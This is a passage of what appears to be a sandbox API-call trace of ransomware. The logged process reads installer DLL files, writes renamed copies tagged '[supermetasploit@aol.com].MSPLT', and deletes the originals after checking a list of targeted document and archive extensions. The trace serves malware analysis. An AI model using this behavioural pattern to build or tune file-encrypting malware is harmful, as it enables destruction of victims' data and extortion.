(lpString=".1cd") returned 4 [0169.094] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.094] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0169.094] lstrlenW (lpString=".jpg") returned 4 [0169.094] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.094] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0169.094] lstrlenW (lpString="SetupResources.dll") returned 18 [0169.094] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0169.094] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=18264) returned 1 [0169.094] CloseHandle (hObject=0x2f8) returned 1 [0169.094] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll")) returned 0x80 [0169.095] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0169.095] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0169.095] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.095] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.095] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0169.095] GetLastError () returned 0x0 [0169.095] ReadFile (in: hFile=0x2f8, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x4758, lpOverlapped=0x0) returned 1 [0169.107] WriteFile (in: hFile=0x300, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0x4760, lpOverlapped=0x0) returned 1 [0169.109] ReadFile (in: hFile=0x2f8, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0169.109] WriteFile (in: hFile=0x300, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0169.109] SetEndOfFile (hFile=0x300) returned 1 [0169.109] CloseHandle (hObject=0x300) returned 1 [0169.112] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.112] SetEndOfFile (hFile=0x2f8) returned 1 [0169.113] CloseHandle (hObject=0x2f8) returned 1 [0169.113] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0169.114] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll")) returned 1 [0169.114] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0169.114] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0169.114] lstrlenW (lpString=".doc") returned 4 [0169.114] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.114] lstrlenW (lpString=".docx") returned 5 [0169.114] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.114] lstrlenW (lpString=".pdf") returned 4 [0169.114] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.114] lstrlenW (lpString=".xls") returned 4 [0169.114] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.114] lstrlenW (lpString=".xlsx") returned 5 [0169.114] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.114] lstrlenW (lpString=".ppt") returned 4 [0169.114] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.114] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0169.115] lstrlenW (lpString=".zip") returned 4 [0169.115] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.115] lstrlenW (lpString=".rar") returned 4 [0169.115] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.115] lstrlenW (lpString=".bz2") returned 4 [0169.115] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.115] lstrlenW (lpString=".7z") returned 3 [0169.115] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.115] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0169.115] lstrlenW (lpString=".dbf") returned 4 [0169.115] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.115] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0169.115] lstrlenW (lpString=".1cd") returned 4 [0169.115] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.115] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0169.115] lstrlenW (lpString=".jpg") returned 4 [0169.115] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.115] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0169.115] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0169.115] lstrlenW (lpString=".doc") returned 4 [0169.115] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.115] lstrlenW (lpString=".docx") returned 5 [0169.115] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.115] lstrlenW (lpString=".pdf") returned 4 [0169.115] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.115] lstrlenW (lpString=".xls") returned 4 [0169.116] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.116] lstrlenW (lpString=".xlsx") returned 5 [0169.116] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.116] lstrlenW (lpString=".ppt") returned 4 [0169.116] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.116] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0169.116] lstrlenW (lpString=".zip") returned 4 [0169.116] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.116] lstrlenW (lpString=".rar") returned 4 [0169.116] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.116] lstrlenW (lpString=".bz2") returned 4 [0169.116] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.116] lstrlenW (lpString=".7z") returned 3 [0169.116] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.116] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0169.116] lstrlenW (lpString=".dbf") returned 4 [0169.116] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.116] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0169.116] lstrlenW (lpString=".1cd") returned 4 [0169.116] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.116] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0169.116] lstrlenW (lpString=".jpg") returned 4 [0169.116] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.116] Sleep (dwMilliseconds=0x64) [0169.745] Sleep (dwMilliseconds=0x64) [0170.246] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0170.246] lstrlenW (lpString="SetupResources.dll") returned 18 [0170.246] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0170.881] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=18264) returned 1 [0170.881] CloseHandle (hObject=0x304) returned 1 [0170.881] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll")) returned 0x80 [0170.881] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0170.882] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0170.882] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.882] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.882] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0170.882] GetLastError () returned 0x0 [0170.882] ReadFile (in: hFile=0x304, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x4758, lpOverlapped=0x0) returned 1 [0170.886] WriteFile (in: hFile=0x2c0, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0x4760, lpOverlapped=0x0) returned 1 [0170.888] ReadFile (in: hFile=0x304, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0170.888] WriteFile (in: hFile=0x2c0, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0170.888] SetEndOfFile (hFile=0x2c0) returned 1 [0170.889] CloseHandle (hObject=0x2c0) returned 1 [0170.892] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.892] SetEndOfFile (hFile=0x304) returned 1 [0170.893] CloseHandle (hObject=0x304) returned 1 [0170.893] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0170.894] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll")) returned 1 [0170.894] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0170.894] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0170.894] lstrlenW (lpString=".doc") returned 4 [0170.894] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0170.894] lstrlenW (lpString=".docx") returned 5 [0170.894] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0170.894] lstrlenW (lpString=".pdf") returned 4 [0170.894] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0170.894] lstrlenW (lpString=".xls") returned 4 [0170.894] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0170.894] lstrlenW (lpString=".xlsx") returned 5 [0170.894] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0170.894] lstrlenW (lpString=".ppt") returned 4 [0170.894] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0170.894] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0170.894] lstrlenW (lpString=".zip") returned 4 [0170.895] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0170.895] lstrlenW (lpString=".rar") returned 4 [0170.895] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0170.895] lstrlenW (lpString=".bz2") returned 4 [0170.895] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0170.895] lstrlenW (lpString=".7z") returned 3 [0170.895] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0170.895] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0170.895] lstrlenW (lpString=".dbf") returned 4 [0170.895] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0170.895] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0170.895] lstrlenW (lpString=".1cd") returned 4 [0170.895] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0170.895] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0170.895] lstrlenW (lpString=".jpg") returned 4 [0170.895] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0170.895] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0170.895] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0170.895] lstrlenW (lpString=".doc") returned 4 [0170.895] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0170.895] lstrlenW (lpString=".docx") returned 5 [0170.895] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0170.895] lstrlenW (lpString=".pdf") returned 4 [0170.895] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0170.895] lstrlenW (lpString=".xls") returned 4 [0170.896] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0170.896] lstrlenW (lpString=".xlsx") returned 5 [0170.896] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0170.896] lstrlenW (lpString=".ppt") returned 4 [0170.896] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0170.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0170.896] lstrlenW (lpString=".zip") returned 4 [0170.896] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0170.896] lstrlenW (lpString=".rar") returned 4 [0170.896] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0170.896] lstrlenW (lpString=".bz2") returned 4 [0170.896] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0170.896] lstrlenW (lpString=".7z") returned 3 [0170.896] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0170.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0170.896] lstrlenW (lpString=".dbf") returned 4 [0170.896] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0170.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0170.896] lstrlenW (lpString=".1cd") returned 4 [0170.896] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0170.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0170.896] lstrlenW (lpString=".jpg") returned 4 [0170.896] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0170.896] Sleep (dwMilliseconds=0x64) [0171.130] Sleep (dwMilliseconds=0x64) [0171.364] Sleep (dwMilliseconds=0x64) [0171.696] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0171.696] lstrlenW (lpString="SetupResources.dll") returned 18 [0171.697] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0171.697] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=15704) returned 1 [0171.697] CloseHandle (hObject=0x370) returned 1 [0171.697] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll")) returned 0x80 [0171.697] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.697] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0171.697] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.697] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.697] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0171.698] GetLastError () returned 0x0 [0171.698] ReadFile (in: hFile=0x370, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x3d58, lpOverlapped=0x0) returned 1 [0171.817] WriteFile (in: hFile=0x374, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0x3d60, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0x3d60, lpOverlapped=0x0) returned 1 [0171.818] ReadFile (in: hFile=0x370, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0171.818] WriteFile (in: hFile=0x374, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0171.818] SetEndOfFile (hFile=0x374) returned 1 [0171.819] CloseHandle (hObject=0x374) returned 1 [0171.820] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.820] SetEndOfFile (hFile=0x370) returned 1 [0171.821] CloseHandle (hObject=0x370) returned 1 [0171.822] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.822] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll")) returned 1 [0171.822] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0171.822] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0171.822] lstrlenW (lpString=".doc") returned 4 [0171.822] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.822] lstrlenW (lpString=".docx") returned 5 [0171.822] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.823] lstrlenW (lpString=".pdf") returned 4 [0171.823] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.823] lstrlenW (lpString=".xls") returned 4 [0171.823] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.823] lstrlenW (lpString=".xlsx") returned 5 [0171.823] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.823] lstrlenW (lpString=".ppt") returned 4 [0171.823] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.823] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0171.823] lstrlenW (lpString=".zip") returned 4 [0171.823] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.823] lstrlenW (lpString=".rar") returned 4 [0171.823] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.823] lstrlenW (lpString=".bz2") returned 4 [0171.823] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.823] lstrlenW (lpString=".7z") returned 3 [0171.823] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.823] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0171.823] lstrlenW (lpString=".dbf") returned 4 [0171.823] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.823] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0171.823] lstrlenW (lpString=".1cd") returned 4 [0171.823] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.823] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0171.823] lstrlenW (lpString=".jpg") returned 4 [0171.823] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.823] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0171.823] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0171.824] lstrlenW (lpString=".doc") returned 4 [0171.824] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.824] lstrlenW (lpString=".docx") returned 5 [0171.824] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.824] lstrlenW (lpString=".pdf") returned 4 [0171.824] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.824] lstrlenW (lpString=".xls") returned 4 [0171.824] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.824] lstrlenW (lpString=".xlsx") returned 5 [0171.824] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.824] lstrlenW (lpString=".ppt") returned 4 [0171.824] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.824] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0171.824] lstrlenW (lpString=".zip") returned 4 [0171.824] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.824] lstrlenW (lpString=".rar") returned 4 [0171.824] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.824] lstrlenW (lpString=".bz2") returned 4 [0171.824] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.824] lstrlenW (lpString=".7z") returned 3 [0171.824] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.824] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0171.824] lstrlenW (lpString=".dbf") returned 4 [0171.824] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.824] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0171.824] lstrlenW (lpString=".1cd") returned 4 [0171.824] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.824] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0171.824] lstrlenW (lpString=".jpg") returned 4 [0171.825] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.825] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0171.825] lstrlenW (lpString="SetupResources.dll") returned 18 [0171.825] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0171.825] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=18264) returned 1 [0171.825] CloseHandle (hObject=0x370) returned 1 [0171.825] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll")) returned 0x80 [0171.825] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.825] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0171.826] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.826] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.826] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0171.826] GetLastError () returned 0x0 [0171.826] ReadFile (in: hFile=0x370, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, 